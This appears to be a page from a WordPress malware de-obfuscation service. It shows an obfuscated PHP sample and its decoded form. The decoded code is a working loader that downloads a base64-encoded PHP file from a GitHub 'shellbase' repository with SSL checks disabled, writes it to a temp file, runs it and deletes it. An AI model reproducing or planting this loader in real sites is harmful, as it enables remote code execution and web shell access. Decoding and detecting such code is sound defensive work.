De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php function syfa_850d1cc9($euoo_f47645ae){$hjpg_94afcc6d=array(base64_decode('aHR0cA==')=>array(base64_decode('bWV0aG9k')=>base64_decode('R0VU'),base64_decode('aGVhZGVy')=>base64_decode('VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBydjozMi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzMyLjANCg==')),base64_decode('c3Ns')=>array(base64_decode('dmVyaWZ5X3BlZXI=')=>false,base64_decode('dmVyaWZ5X3BlZXJfbmFtZQ==')=>false));$ptpr_e25d857e=stream_context_create($hjpg_94afcc6d);$htoi_136ac113=file_get_contents($euoo_f47645ae,false,$ptpr_e25d857e);return $htoi_136ac113;}$euoo_f47645ae=base64_decode('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NudWxsMDAvYnM2NHNoZWxsYmFzZS9yZWZzL2hlYWRzL21haW4vbnVsbDEucGhw');$jdot_82d4a69e=syfa_850d1cc9($euoo_f47645ae);$imip_3a506db5=base64_decode($jdot_82d4a69e);$dzmd_d4e79938=tempnam(sys_get_temp_dir(),base64_decode('dG1wX3BocF8='));file_put_contents($dzmd_d4e79938,$imip_3a506db5);require_once $dzmd_d4e79938;unlink($dzmd_d4e79938);?>
<?php function syfa_850d1cc9($euoo_f47645ae) { $hjpg_94afcc6d = array("http" => array("method" => "GET", "header" => "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\r\n"), "ssl" => array("verify_peer" => false, "verify_peer_name" => false)); $ptpr_e25d857e = stream_context_create($hjpg_94afcc6d); $htoi_136ac113 = file_get_contents($euoo_f47645ae, false, $ptpr_e25d857e); return $htoi_136ac113; } $euoo_f47645ae = "https://raw.githubusercontent.com/Cnull00/bs64shellbase/refs/heads/main/null1.php"; $jdot_82d4a69e = syfa_850d1cc9($euoo_f47645ae); $imip_3a506db5 = base64_decode($jdot_82d4a69e); $dzmd_d4e79938 = tempnam(sys_get_temp_dir(), "tmp_php_"); file_put_contents($dzmd_d4e79938, $imip_3a506db5); require_once $dzmd_d4e79938; unlink($dzmd_d4e79938);
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.